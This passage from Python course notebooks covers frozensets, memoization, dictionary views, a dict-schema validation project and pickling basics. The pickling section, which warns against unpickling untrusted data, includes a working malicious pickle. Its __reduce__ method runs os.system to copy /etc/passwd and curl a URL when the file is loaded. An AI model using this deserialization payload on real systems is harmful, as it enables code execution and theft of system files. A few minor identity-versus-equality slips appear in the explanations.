Remember that there's really no point in making a shallow copy of an immutable container - so, Python optimizes this for us and just returns the original tuple. Of course, lists are mutable, and that optimization cannot happen.

The same thing happens with sets and frozen sets:

In [12]:
s1 = {1, 2, 3}
s2 = set(s1)
s1 is s2

False

In [13]:
s1 = frozenset([1, 2, 3])
s2 = frozenset(s1)
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> True


Same goes with the `copy()` method:

In [14]:
s2 = s1.copy()
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> True


Of course, this will not happen with a deep copy in general:

In [15]:
from copy import deepcopy

In [16]:
s2 = deepcopy(s1)
print(type(s1), type(s2), s1 is s2)

<class 'frozenset'> <class 'frozenset'> False


#### Set Operations

All the non-mutating set operations we studied with sets also apply to frozen sets.

But, in addition, we can mix sets and frozen sets when performing these operations.

For example:

In [17]:
s1 = frozenset({'a', 'b'})
s2 = {1, 2}
s3 = s1 | s2

In [18]:
s3

frozenset({1, 2, 'a', 'b'})

What's important to note here is the data type of the result - it is a frozen set.
Let's do this operation again, but switch around `s1` and `s2`:

In [19]:
s3 = s2 | s1

In [20]:
s3

{1, 2, 'a', 'b'}

As you can see, the result is now a standard set.

Basically the data type of the first operand determines the data type of the result.

In [21]:
s1 = frozenset({'a', 'b', 'c'})
s2 = {'c', 'd', 'e'}

In [22]:
s1 & s2

frozenset({'c'})

In [23]:
s2 & s1

{'c'}

Same goes with differences and symmetric differences:

In [24]:
s1 - s2

frozenset({'a', 'b'})

In [25]:
s2 - s1

{'d', 'e'}

In [26]:
s1 ^ s2

frozenset({'a', 'b', 'd', 'e'})

In [27]:
s2 ^ s1

{'a', 'b', 'd', 'e'}

What about equality?

In [28]:
s1 = {1, 2}
s2 = frozenset(s1)

In [29]:
s1 is s2

False

In [30]:
s1 == s2

True

As you can see, this is very similar behavior to numerical values:

In [31]:
1 == 1.0

True

In [32]:
1 == 1 + 0j

True

Even though they are not the same data type (and hence cannot possibly be the same object), equality still works "as expected".

##### Application 1

One application of frozen sets, assuming they are hashable, is as keys for a dictionary.

Recall an example we worked on in the past where we wanted a `Person` object to be used as a key in a dictionary.

We had to define the class, equality and the hash - that was quite a bit of work for what amounted to, in the end just checking that the name and age were the same.

Of course, we may have more complex instances of this, but for a simple case like that, especially if we consider our `Person` class to be immutable, it would have been easier to just use a frozen set containing the name and age:

In [33]:
class Person:
    def __init__(self, name, age):
        self._name = name
        self._age = age
        
    def __repr__(self):
        return f'Person(name={self._name}, age={self._age})'
    
    @property
    def name(self):
        return self._name
        
    @property
    def age(self):
        return self._age
    
    def key(self):
        return frozenset({self.name, self.age})

In [34]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)

In [35]:
d = {p1.key(): p1, p2.key(): p2}

In [36]:
d

{frozenset({78, 'John'}): Person(name=John, age=78),
 frozenset({75, 'Eric'}): Person(name=Eric, age=75)}

And we can easily lookup using those keys now:

In [37]:
d[frozenset({'John', 78})]

Person(name=John, age=78)

In [38]:
d[frozenset({78, 'John'})]

Person(name=John, age=78)

Of course this is kind of a limited use case, but in the event you have the need to use sets as dictionary keys, then you technically can using a frozen set (as long as the elements are all hashable).

##### Application 2

A slightly more interesting application of this is memoization. I cover memoization in detail in Part 1 of this series in the section on decorators.

Recall that memoization is basically a technique to cache the results of a (deterministic) function call based on the provided arguments. A cache is created that contains the results of calling the function with a particular set of arguments, the next time the function is called, the arguments are checked against the cache - if the arguments exist in the cache, then the cached value is returned instead of re-executing the function.

Although Python's `functools` has the `lru_cache` decorator available, there is one drawback - the order of the keyword arguments matters.

Let's see this:

In [39]:
from functools import lru_cache

In [40]:
@lru_cache()
def my_func(*, a, b):
    print('calculating a+b...')
    return a + b

In [41]:
my_func(a=1, b=2)

calculating a+b...


3

In [42]:
my_func(a=1, b=2)

3

Notice how the second time around, we did not see `calculating a+b...` printed out - that's because the value was pulled from cache.

But now look at this:

In [43]:
my_func(b=2, a=1)

calculating a+b...


3

Even though the values are technically the same, the order in which we specified them as different, and the cache considered the arguments to be different. Now of course, both "styles" are cached:

In [44]:
my_func(a=1, b=2)
my_func(b=2, a=1)

3

An interesting side note, now that we know all about hashability!
You'll notice that the way `my_func` works we can actually pass in other data types than just numbers. We could use strings, tuples, even lists or sets:

In [45]:
my_func(a='abc', b='def')

calculating a+b...


'abcdef'

In [46]:
my_func(a='abc', b='def')

'abcdef'

As you can see caching works just fine.
But what is being used to back the cache for `lru_cache`? A dictionary...
And what do we know about dictionary keys? They must be hashable!

So this will actually fail, and not because the function can't handle it, but because the `lru_cache` mechanism cannot:

In [47]:
my_func(a=[1, 2, 3], b=[4, 5, 6])

TypeError: unhashable type: 'list'

Let's write our own version of this.
We'll use a dictionary to cache the arguments - so we'll need to come up with a key representing the arguments - and one in which the order of the keyword-only arguments does not matter. We'll have the same limitation in terms of hashable keys as `lru_cache`, but at least we won't have the argument ordering issue:

In [48]:
def memoizer(fn):
    cache = {}
    def inner(*args, **kwargs):
        key = (*args, frozenset(kwargs.items()))
        if key in cache:
            return cache[key]
        else:
            result = fn(*args, **kwargs)
            cache[key] = result
            return result
    return inner

In [49]:
@memoizer
def my_func(*, a, b):
    print('calculating a+b...')
    return a + b

In [50]:
my_func(a=1, b=2)

calculating a+b...


3

In [51]:
my_func(a=1, b=2)

3

So far so good... Now let's swap the arguments around:

In [52]:
my_func(b=2, a=1)

3

Yay!! It used the cache!

We can even tweak this to effectively provide more efficient caching when the order of positional arguments is not important either:

In [53]:
def memoizer(fn):
    cache = {}
    def inner(*args, **kwargs):
        key = frozenset(args) | frozenset(kwargs.items())
        if key in cache:
            return cache[key]
        else:
            result = fn(*args, **kwargs)
            cache[key] = result
            return result
    return inner

In [54]:
@memoizer
def adder(*args):
    print('calculating...')
    return sum(args)

In [55]:
adder(1, 2, 3)

calculating...


6

In [56]:
adder(3, 2, 1)

6

In [57]:
adder(2, 1, 3)

6

In [58]:
adder(1, 2, 3, 4)

calculating...


10

In [59]:
adder(4, 2, 1, 3)

10

Isn't Python fun!!

##  Views: Keys, Values and Items

#### Views are not Static

These view objects are not static - so it's not like Python makes a copy of the keys, values or items, and uses these static copies. They are like windows (views) into the **current** state of the dictionary. If the dictionary changes, then these views reflect those changes immediately.

Basically these views provide methods that access the underlying dictionary. They do not "own" any data.

In [1]:
d = {'a': 1, 'b': 2}

In [2]:
keys = d.keys()
values = d.values()
items = d.items()

In [3]:
print(id(keys), id(values), id(items))

4347984680 4347985016 4347985064


In [4]:
print(keys)
print(values)
print(items)

dict_keys(['a', 'b'])
dict_values([1, 2])
dict_items([('a', 1), ('b', 2)])


In [5]:
d['z'] = 100

In [6]:
print(id(keys), id(values), id(items))

4347984680 4347985016 4347985064


As you can see the memory address of these view objects has not changed:

In [7]:
print(keys)
print(values)
print(items)

dict_keys(['a', 'b', 'z'])
dict_values([1, 2, 100])
dict_items([('a', 1), ('b', 2), ('z', 100)])


but the view 'contents' have changed. These views are **dynamic**.

#### Mutating a dictionary while iterating over these views

Because these views instantly reflect any modifications made to the underlying dictionary, we have to be careful changing the dictionary while we iterate over a view! 

In [8]:
d = {'a': 1, 'b': 2, 'c': 3}

In [9]:
for k, v in d.items():
    print(k, v)
    del d[k]

a 1


RuntimeError: dictionary changed size during iteration

As you can see Python complains about this. But the interesting thing is that Python does not complain about the deletion itself - notice where the exception occurs - at the loop, not the delete statement.

In fact, the dictionary **has** changed:

In [10]:
d

{'b': 2, 'c': 3}

As you can see the key `a` is gone.

So the deletion happens just fine, but when Python continues the loop, at that point it detects that the dictionary has changed - and an exception is raised at that point. But notice the exception message - Python is complaining about the **size** of the dictionary changing... 
We'll come back to that point in a minute.

What about insertions, will Python complain about it?

In [11]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v)
    d['z'] = 100

a 1


RuntimeError: dictionary changed size during iteration

No, that's not allowed either.

It is perfectly fine to modify the values though:

In [12]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v)
    d[k] = 1000

a 1
b 2
c 3


and of course our dictionary values have changed:

In [13]:
d

{'a': 1000, 'b': 1000, 'c': 1000}

What about the other views, are they more tolerant of underlying mutations? We would not expect the key view to allow this, but what about the values view? After all it is not referencing the keys at all...

In [14]:
d = {'a': 1, 'b': 2, 'c': 3}
for v in d.values():
    print(v)
    del d['a']

1


RuntimeError: dictionary changed size during iteration

No, not allowed either! We just cannot change the size of the dictionary (and hence the size of the view too) while iterating over it.

So, if that's the limitation, then we should be able to modify the values of elements as we iterate over the keys:

In [15]:
d = {'a': 1, 'b': 2, 'c': 3}

In [16]:
for key in d.keys():
    d[key] = 100

In [17]:
d

{'a': 100, 'b': 100, 'c': 100}

Even this will work fine:

In [18]:
for k, v in d.items():
    d[k] = v * 2

In [19]:
d

{'a': 200, 'b': 200, 'c': 200}

The moral here is that you should not manipulate the keys of a dictionary as you iterate over it - either directly, or using the views.
Mutating associated values is perfectly fine.

#### Iterating over a dictionary vs iterating over the keys view

As we just mentioned, dictionaries implement the iterable protocol which iterates over the keys of the dictionary:

In [20]:
d = dict.fromkeys('python', 0)

In [21]:
for k in d:
    print(k)

p
y
t
h
o
n


This would be the same as requesting the iterator from the dictionary and using the iterator:

In [22]:
d_iter = iter(d)
for k in d_iter:
    print(k)

p
y
t
h
o
n


So, you may very well be asking yourself whether we should iterate keys using the dictionaries iterator, or using the key view? After all it seems to do the same thing...

And yes, either one would be just fine for iterating over the keys of a dictionary. Let's just make sure the performance is about the same:

In [23]:
from timeit import timeit
from random import randint

d = {k: randint(0, 100) for k in range(10_000)}
keys = d.keys()

def iter_direct(d):
    for k in d:
        pass
    
def iter_view(d):
    for k in d.keys():
        pass

def iter_view_direct(view):
    for k in view:
        pass
    
print(timeit('iter_direct(d)', globals=globals(), number=20_000))
print(timeit('iter_view(d)', globals=globals(), number=20_000))
print(timeit('iter_view_direct(keys)', globals=globals(), number=20_000))

1.857292921980843
1.8094384070136584
1.8164116419502534


As you can see, unless you are re-creating a new view object every time, the performance difference between iterating via the dictionary's iterator and the view's iterator is about the same. [In fact, it's the same iterator in both cases!] 
But since there is really no need to re-create a view once it's been created (since is is dynamic), the overhead of creating the `keys` view is a one-time hit.
And a `keys` view provides far more functionality than just iteration - as we know it behaves like a set - so if you need to perform set operations on the keys you'll need to use the `keys` view.

#### Iterating over keys and values

As we saw, we can use the `.items()` view to iterate over both the keys and values of a dictionary.

In [24]:
d = {'a': 1, 'b': 2, 'c': 3}

In [25]:
for k, v in d.items():
    print(k, v)

a 1
b 2
c 3


You might be tempted to do it this way as well:

In [26]:
for k in d:
    print(k, d[k])

a 1
b 2
c 3


But this is quite inefficient!
Let's try some timings.

In [27]:
d = {k: randint(0, 100) for k in range(10_000)}
items = d.items()

def iterate_view(view):
    for k, v in view:
        pass
    
def iterate_clunky(d):
    for k in d:
        d[k]
        
print(timeit('iterate_view(items)', globals=globals(), number=5_000))
print(timeit('iterate_clunky(d)', globals=globals(), number=5_000))

0.8359718360006809
1.3389352719532326


As you can see, it is substantially slower to iterate over both the keys and the values of the dictionary using the second approach. This is because in the second approach, we have to perform a lot of dictionary lookups - while lookups are particularlay efficient in Python, they are slower than not doing a lookup at all!

#### Iterating a dictionary while mutating keys

As we mentioned earlier, we cannot mutate a dictionary's keys while iterating over it:

Let's see an example of this:

In [28]:
d = {'a': 1, 'b': 2, 'c': 3}
for k, v in d.items():
    print(k, v ** 2)
    del d[k]

a 1


RuntimeError: dictionary changed size during iteration

One way to solve this is to create a static list of all the keys, and iterate over that instead:

In [29]:
d = {'a': 1, 'b': 2, 'c': 3}
keys = list(d.keys())
print(keys)

['a', 'b', 'c']


In [30]:
for k in keys:
    value = d.pop(k)
    print(f'{value} ** 2 = {value ** 2}')

1 ** 2 = 1
2 ** 2 = 4
3 ** 2 = 9


In [31]:
d

{}

Another way would be to use the `popitem` method. We just need to know how many times we can call `popitem`, or catch the `KeyError` exception when it occurs:

In [32]:
d = {'a':1, 'b':2, 'c':3}
for _ in range(len(d)):
    key, value = d.popitem()
    print(key, value, value**2)

c 3 9
b 2 4
a 1 1


Or we can use a `while` loop:

In [33]:
d = {'a':1, 'b':2, 'c':3}
while len(d) > 0:
    key, value = d.popitem()
    print(key, value, value**2)

c 3 9
b 2 4
a 1 1


Or we can simply keep iterating indefinitely until a `KeyError` exception occurs:

In [34]:
d = {'a':1, 'b':2, 'c':3}
while True:
    try:
        key, value = d.popitem()
    except KeyError:
        break
    else:
        print(key, value, value**2)

c 3 9
b 2 4
a 1 1


# Section 06 - Project 1

##  Project 1

In this project our goal is to validate one dictionary structure against a template dictionary.

A typical example of this might be working with JSON data inputs in an API. You are trying to validate this received JSON against some kind of template to make sure the received JSON conforms to that template (i.e. all the keys and structure are identical - value types being important, but not the value itself - so just the structure, and the data type of the values).

To keep things simple we'll assume that values can be either single values (like an integer, string, etc), or a dictionary, itself only containing single values or other dictionaries, recursively. In other words, we're not going to deal with lists as possible values. Also, to keep things simple, we'll assume that all keys are **required**, and that no extra keys are permitted.

In practice we would not have these simplifying assumptions, and although we could definitely write this ourselves, there are many 3rd party libraries that already exist to do this (such as `jsonschema`, `marshmallow`, and many more, some of which I'll cover lightly in some later videos.)

For example you might have this template:

In [1]:
template = {
    'user_id': int,
    'name': {
        'first': str,
        'last': str
    },
    'bio': {
        'dob': {
            'year': int,
            'month': int,
            'day': int
        },
        'birthplace': {
            'country': str,
            'city': str
        }
    }
}

So, a JSON document such as this would match the template:

In [2]:
john = {
    'user_id': 100,
    'name': {
        'first': 'John',
        'last': 'Cleese'
    },
    'bio': {
        'dob': {
            'year': 1939,
            'month': 11,
            'day': 27
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Weston-super-Mare'
        }
    }
}

But this one would **not** match the template (missing key):

In [3]:
eric = {
    'user_id': 101,
    'name': {
        'first': 'Eric',
        'last': 'Idle'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 3,
            'day': 29
        },
        'birthplace': {
            'country': 'United Kingdom'
        }
    }
}

And neither would this one (wrong data type):

In [4]:
michael = {
    'user_id': 102,
    'name': {
        'first': 'Michael',
        'last': 'Palin'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 'May',
            'day': 5
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Sheffield'
        }
    }
}

Write a function such this:

In [5]:
def validate(data, template):
    # implement
    # and return True/False
    # in the case of False, return a string describing 
    # the first error encountered
    # in the case of True, string can be empty
    return state, error

That should return this:
* `validate(john, template) --> True, ''`
* `validate(eric, template) --> False, 'mismatched keys: bio.birthplace.city'`
* `validate(michael, template) --> False, 'bad type: bio.dob.month'`

Better yet, use exceptions instead of return codes and strings!

##  Project 1 - Solution

In this project our goal is to validate one dictionary structure against a template dictionary.

A typical example of this might be working with JSON data inputs in an API. You are trying to validate this received JSON against some kind of template to make sure the received JSON conforms to that template (i.e. all the keys and structure are identical - value types being important, but not the value itself - so just the structure, and the data type of the values).

To keep things simple we'll assume that values can be either single values (like an integer, string, etc), or a dictionary, itself only containing single values or other dictionaries, recursively. In other words, we're not going to deal with lists as possible values. Also, to keep things simple, we'll assume that all keys are **required**, and that no extra keys are permitted.

In practice we would not have these simplifying assumptions, and although we could definitely write this ourselves, there are many 3rd party libraries that already exist to do this (such as `jsonschema`, `marshmallow`, and many more, some of which I'll cover lightly in some later videos.)

For example you might have this template:

In [1]:
template = {
    'user_id': int,
    'name': {
        'first': str,
        'last': str
    },
    'bio': {
        'dob': {
            'year': int,
            'month': int,
            'day': int
        },
        'birthplace': {
            'country': str,
            'city': str
        }
    }
}

So, a JSON document such as this would match the template:

In [2]:
john = {
    'user_id': 100,
    'name': {
        'first': 'John',
        'last': 'Cleese'
    },
    'bio': {
        'dob': {
            'year': 1939,
            'month': 11,
            'day': 27
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Weston-super-Mare'
        }
    }
}

But this one would **not** match the template (missing key):

In [3]:
eric = {
    'user_id': 101,
    'name': {
        'first': 'Eric',
        'last': 'Idle'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 3,
            'day': 29
        },
        'birthplace': {
            'country': 'United Kingdom'
        }
    }
}

And neither would this one (wrong data type):

In [4]:
michael = {
    'user_id': 102,
    'name': {
        'first': 'Michael',
        'last': 'Palin'
    },
    'bio': {
        'dob': {
            'year': 1943,
            'month': 'May',
            'day': 5
        },
        'birthplace': {
            'country': 'United Kingdom',
            'city': 'Sheffield'
        }
    }
}

Write a function such this:

In [5]:
def validate(data, template):
    # implement
    # and return True/False
    # in the case of False, return a string describing 
    # the first error encountered
    # in the case of True, string can be empty
    return state, error

That should return this:
* `validate(john, template) --> True, ''`
* `validate(eric, template) --> False, 'mismatched keys: bio.birthplace.city'`
* `validate(michael, template) --> False, 'bad type: bio.dob.month'`

##### Solution

There are many ways to approach this, but a recursive approach here will probably be simpler (not simple, just simpl**er**!) since we want to write a function that does not make any assumptions about how many dictionaries are nested.

My approach is going to be as follows:
1. Write a recursive function
2. Maintain a breadcrumb (or *path*) of where we're at in the nested dictionaries (e.g. `bio.birthplace`)
3. Check to make sure all the required keys from the template are present in the data (for the same level)
4. For dictionary valued keys, recursively call my function
5. For non-dictionary values make sure they are of the correct type

I'm going to build this function up little by little.

Let's first start by determining if we have mismatched keys: missing keys required by template, or extra keys in data not specified by template:

In [6]:
def match_keys(data, valid, path):
    # path is just a string containing the current path
    # that we can use to append the extra/missing keys
    # and create a full path for the mismatched keys
    data_keys = data.keys()
    valid_keys = valid.keys()
    # we could just use data_keys ^ valid_keys
    # to get mismatched keys, but I prefer to differentiate
    # between missing and extra keys separately
    extra_keys = data_keys - valid_keys
    missing_keys = valid_keys - data_keys
    # Finally, build up the error state and message
    if missing_keys or extra_keys:
        is_ok = False
        missing_msg = ('missing keys:' +
                       ','.join({path + '.' + str(key) 
                                 for key in missing_keys})
                      ) if missing_keys else ''
        extras_msg = ('extra keys:' + 
                     ','.join({path + '.' + str(key) 
                               for key in extra_keys})
                     ) if extra_keys else ''
        return False, ' '.join((missing_msg, extras_msg))
    else:
        return True, None

Let's test this function out:

In [7]:
t = {'a': int, 'b': int, 'c': int, 'd': int}
d = {'a': 'wrong type', 'b': 100, 'c': 200, 'd': {'wrong': 'type'}}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

True None


In [8]:
d = {'a': 'test', 'b': 'test', 'c': 'test'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False missing keys:some.path.d 


In [9]:
d = {'a': 'test', 'b': 'test', 'c': 'test', 'd': 'test', 'z': 'extra'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False  extra keys:some.path.z


In [10]:
d = {'a': 'test', 'b': 'test', 'z': 'extra'}
is_ok, err_msg = match_keys(d, t, 'some.path')
print(is_ok, err_msg)

False missing keys:some.path.d,some.path.c extra keys:some.path.z


OK, so now let's write a function that matches the types of corresponding (could be an actual type, or a nested dictionary):

In [11]:
def match_types(data, template, path):
    # assume here that the keys have already been matched OK
    # but do not assume that the keys are necessarily in the same
    # order in both the data and the template
    for key, value in template.items():
        if isinstance(value, dict):
            template_type = dict
        else:
            template_type = value
        data_value = data.get(key, object())
        if not isinstance(data_value, template_type):
            err_msg = ('incorrect type: ' + path + '.' + key +
                       ' -> expected ' + template_type.__name__ +
                       ', found ' + type(data_value).__name__)
            return False, err_msg
    return True, None        

Let's test this one out:

In [12]:
t = {'a': int, 'b': str, 'c': {'d': int}}
d = {'a': 100, 'b': 'test', 'c': {'some': 'dict'}}
match_types(d, t, 'some.path')

(True, None)

In [13]:
d = {'a': 100, 'b': 'test', 'c': 'unexpected'}
match_types(d, t, 'some.path')

(False, 'incorrect type: some.path.c -> expected dict, found str')

In [14]:
d = {'a': 100, 'b': 200, 'c': {'some': 'dict'}}
match_types(d, t, 'some.path')

(False, 'incorrect type: some.path.b -> expected str, found int')

OK, so far so good!

Now it's time to combine these into our main recursive function:

In [15]:
def recurse_validate(data, template, path):
    # validate keys match
    is_ok, err_msg = match_keys(data, template, path)
    if not is_ok:
        return False, err_msg

    # validate individual data types match
    is_ok, err_msg = match_types(data, template, path)
    if not is_ok:
        return False, err_msg
    
    # Now see if we have nested dictionaries in template
    # (or data, since we know both keys and value data types match)
    dictionary_type_keys = {key for key, value in template.items()
                           if isinstance(value, dict)}
    for key in dictionary_type_keys:
        sub_path = path + '.' + str(key)
        sub_template = template[key]
        sub_data = data[key]
        is_ok, err_msg = recurse_validate(sub_data, sub_template, sub_path)
        if not is_ok:
            return False, err_msg
        
    return True, None

Now let's test this function:

In [16]:
is_ok, err_msg = recurse_validate(john, template, 'root')
print(is_ok, err_msg)

True None


In [17]:
is_ok, err_msg = recurse_validate(eric, template, 'root')
print(is_ok, err_msg)

False missing keys:root.bio.birthplace.city 


In [18]:
is_ok, err_msg = recurse_validate(michael, template, 'root')
print(is_ok, err_msg)

False incorrect type: root.bio.dob.month -> expected int, found str


Nice, now all that's left is to write our main function - it's only role really is to hide the recursive function from the caller, and provide a "start" path (which should be empty):

In [19]:
def validate(data, template):
    return recurse_validate(data, template, '')

In [20]:
persons = ((john, 'John'), (eric, 'Eric'), (michael, 'Michael'))

In [21]:
for person, name in persons:
    is_ok, err_msg = validate(person, template)
    print(f'{name}: valid={is_ok}: {err_msg}')

John: valid=True: None
Eric: valid=False: missing keys:.bio.birthplace.city 
Michael: valid=False: incorrect type: .bio.dob.month -> expected int, found str


As an additional tweak, I'm not going to return a tuple with the sate and the error message, instead I'm going to use exceptions to do the same thing:

In [22]:
class SchemaError(Exception):
    pass

def validate(data, template):
    is_ok, err_msg = recurse_validate(data, template, '')
    if not is_ok:
        raise SchemaError(err_msg)

Then we can use the validator this way:

In [23]:
validate(john, template)

In [24]:
validate(eric, template)

SchemaError: missing keys:.bio.birthplace.city 

In [25]:
validate(michael, template)

SchemaError: incorrect type: .bio.dob.month -> expected int, found str

Of course, we could use this approach throughout instead of returning a status and an exception - this would make this a bit cleaner, and we can also differentiate between key mismatches vs value mismatches:

In [26]:
class SchemaError(Exception):
    pass

class SchemaKeyMismatch(SchemaError):
    pass

class SchemaTypeMismatch(SchemaError, TypeError):
    pass

In [27]:
def match_keys(data, valid, path):
    # path is just a string containing the current path
    # that we can use to append the extra/missing keys
    # and create a full path for the mismatched keys
    data_keys = data.keys()
    valid_keys = valid.keys()
    # we could just use data_keys ^ valid_keys
    # to get mismatched keys, but I prefer to differentiate
    # between missing and extra keys separately
    extra_keys = data_keys - valid_keys
    missing_keys = valid_keys - data_keys
    # Finally, build up the error state and message
    if missing_keys or extra_keys:
        is_ok = False
        missing_msg = ('missing keys:' +
                       ','.join({path + '.' + str(key) 
                                 for key in missing_keys})
                      ) if missing_keys else ''
        extras_msg = ('extra keys:' + 
                     ','.join({path + '.' + str(key) 
                               for key in extra_keys})
                     ) if extra_keys else ''
        raise SchemaKeyMismatch(' '.join((missing_msg, extras_msg)))

In [28]:
def match_types(data, template, path):
    # assume here that the keys have already been matched OK
    # but do not assume that the keys are necessarily in the same
    # order in both the data and the template
    for key, value in template.items():
        if isinstance(value, dict):
            template_type = dict
        else:
            template_type = value
        data_value = data.get(key, object())
        if isinstance(data_value, template_type):
            continue
        else:
            err_msg = ('incorrect type: ' + path + '.' + key +
                       ' -> expected ' + template_type.__name__ +
                       ', found ' + type(data_value).__name__)
            raise SchemaTypeMismatch(err_msg)

In [29]:
def recurse_validate(data, template, path):
    match_keys(data, template, path)
    match_types(data, template, path)

    # Now see if we have nested dictionaries in template
    # (or data, since we know both keys and value data types match)
    dictionary_type_keys = {key for key, value in template.items()
                           if isinstance(value, dict)}
    for key in dictionary_type_keys:
        sub_path = path + '.' + str(key)
        sub_template = template[key]
        sub_data = data[key]
        recurse_validate(sub_data, sub_template, sub_path)

In [30]:
def validate(data, template):
    recurse_validate(data, template, '')

In [31]:
validate(john, template)

In [32]:
validate(eric, template)

SchemaKeyMismatch: missing keys:.bio.birthplace.city 

In [33]:
validate(michael, template)

SchemaTypeMismatch: incorrect type: .bio.dob.month -> expected int, found str

The nice thing about the way we have structured our exceptions is that we can catch them either as specific `SchemaKeyMismatch` or `SchemaTypeMismatch` exceptions, but also more broadly as `SchemaError` exceptions:

In [34]:
try:
    validate(eric, template)
except SchemaError as ex:
    print(ex)

missing keys:.bio.birthplace.city 


In [35]:
try:
    validate(eric, template)
except SchemaKeyMismatch as ex:
    print('mismatched keys, doing some specific handling for that')
    print(ex)
except SchemaTypeMismatch as ex:
    print('mismatched types, doing some specific handling for that')
    print(ex)

mismatched keys, doing some specific handling for that
missing keys:.bio.birthplace.city 


In [36]:
try:
    validate(michael, template)
except SchemaKeyMismatch as ex:
    print('mismatched keys, doing some specific handling for that')
    print(ex)
except SchemaTypeMismatch as ex:
    print('mismatched types, doing some specific handling for that')
    print(ex)

mismatched types, doing some specific handling for that
incorrect type: .bio.dob.month -> expected int, found str


# Section 07 - Serialization and Deserialization

##  Pickling

#### Not Secure!

Pickling is not a secure way to deserialize data objects. **DO NOT** unpickle anything you did not pickle yourself. You have been **WARNED**!

Here's how easy it is to create an exploit.

I am going to pickle an object that is going to use the unix shell (admittedly this will not work on Windows, but it could with some more complicated code - plus I don't need this to run on every machine in the world, just as many as possible - at least that's the mindset if I were a hacker I guess)

In [1]:
import os
import pickle


class Exploit():
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))


def serialize_exploit(fname):
    with open(fname, 'wb') as f:
        pickle.dump(Exploit(), f)

Now, I serialize this code to a file:

In [2]:
serialize_exploit('loadme')

Now I send this file to some unsuspecting recipients and tell them they just need to load this up in their Python app. They deserialize the pickled object like so:

In [3]:
import pickle

pickle.load(open('loadme', 'rb'))

0

And now take a look at your folder that contains this notebook!

#### Pickling Dictionaries

In this part of the course I am only going to discuss pickling basic data types such as numbers, strings, tuples, lists, sets and dictionaries.

In general tuples, lists, sets and dictionaries are all picklable as long as their elements are themselves picklable.

Let's start by serializing some simple data types, such as strings and numbers.

Instead of serializing to a file, I will store the resulting pickle data in a variable, so we can easily inspect it and unpickle it:

In [4]:
import pickle

In [5]:
ser = pickle.dumps('Python Pickled Peppers')

In [6]:
ser

b'\x80\x03X\x16\x00\x00\x00Python Pickled Peppersq\x00.'

We can deserialize the data this way:

In [7]:
deser = pickle.loads(ser)

In [8]:
deser

'Python Pickled Peppers'

We can do the same thing with numerics:

In [9]:
ser = pickle.dumps(3.14)

In [10]:
ser

b'\x80\x03G@\t\x1e\xb8Q\xeb\x85\x1f.'

In [11]:
deser = pickle.loads(ser)

In [12]:
deser

3.14

We can do the same with lists and tuples:

In [13]:
d = [10, 20, ('a', 'b', 30)]

In [14]:
ser = pickle.dumps(d)

In [15]:
ser

b'\x80\x03]q\x00(K\nK\x14X\x01\x00\x00\x00aq\x01X\x01\x00\x00\x00bq\x02K\x1e\x87q\x03e.'

In [16]:
deser = pickle.loads(ser)

In [17]:
deser

[10, 20, ('a', 'b', 30)]

Note that the original and the deserialized objects are equal, but not identical:

In [18]:
d is deser, d == deser

(False, True)

This works the same way with sets too:

In [19]:
s = {'a', 'b', 'x', 10}

In [20]:
s

{10, 'a', 'b', 'x'}

In [21]:
ser = pickle.dumps(s)
print(ser)

b'\x80\x03cbuiltins\nset\nq\x00]q\x01(X\x01\x00\x00\x00aq\x02K\nX\x01\x00\x00\x00xq\x03X\x01\x00\x00\x00bq\x04e\x85q\x05Rq\x06.'


In [22]:
deser = pickle.loads(ser)
print(deser)

{'a', 10, 'b', 'x'}


And finally, we can pickle dictionaries as well:

In [23]:
d = {'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}

In [24]:
print(d)

{'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}


In [25]:
ser = pickle.dumps(d)

In [26]:
ser

b'\x80\x03}q\x00(X\x01\x00\x00\x00bq\x01K\x01X\x01\x00\x00\x00aq\x02K\x02X\x01\x00\x00\x00cq\x03}q\x04(X\x01\x00\x00\x00xq\x05K\nX\x01\x00\x00\x00yq\x06K\x14uu.'

In [27]:
deser = pickle.loads(ser)

In [28]:
print(deser)

{'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}


In [29]:
d == deser

True

What happens if we pickle a dictionary that has two of it's values set to another dictionary?

In [30]:
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}

In [31]:
print(d2)

{'x': 100, 'y': {'a': 10, 'b': 20}, 'z': {'a': 10, 'b': 20}}


Let's say we pickle `d2`:

In [32]:
ser = pickle.dumps(d2)

Now let's unpickle that object:

In [33]:
d3 = pickle.loads(ser)

In [34]:
d3

{'x': 100, 'y': {'a': 10, 'b': 20}, 'z': {'a': 10, 'b': 20}}

That seems to work... Is that sub-dictionary still the same as the original one?

In [35]:
d3['y'] == d2['y']

True

In [36]:
d3['y'] is d2['y']

False

But consider the original dictionary `d2`: both the `x` and `y` keys referenced the **same** dictionary `d1`:

In [37]:
d2['y'] is d2['z']

True

How did this work with our deserialized dictionary?

In [38]:
d3['y'] == d3['z']

True

As you can see the relative shared object is maintained.

As you can see our dictionary `d` looks like the earlier one. So, when Python serializes the dictionary, it behaves very similarly to serializing a deep copy of the dictionary. The same thing happens with other collections types such as lists, sets, and tuples.

What this means though is that you have to be very careful how you use serialization and deserialization.

Consider this piece of code:

In [39]:
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
print(d2)
d1['c'] = 3
print(d1)
print(d2)

{'a': 1, 'b': 2}
{'x': 10, 'y': {'a': 1, 'b': 2}}
{'a': 1, 'b': 2, 'c': 3}
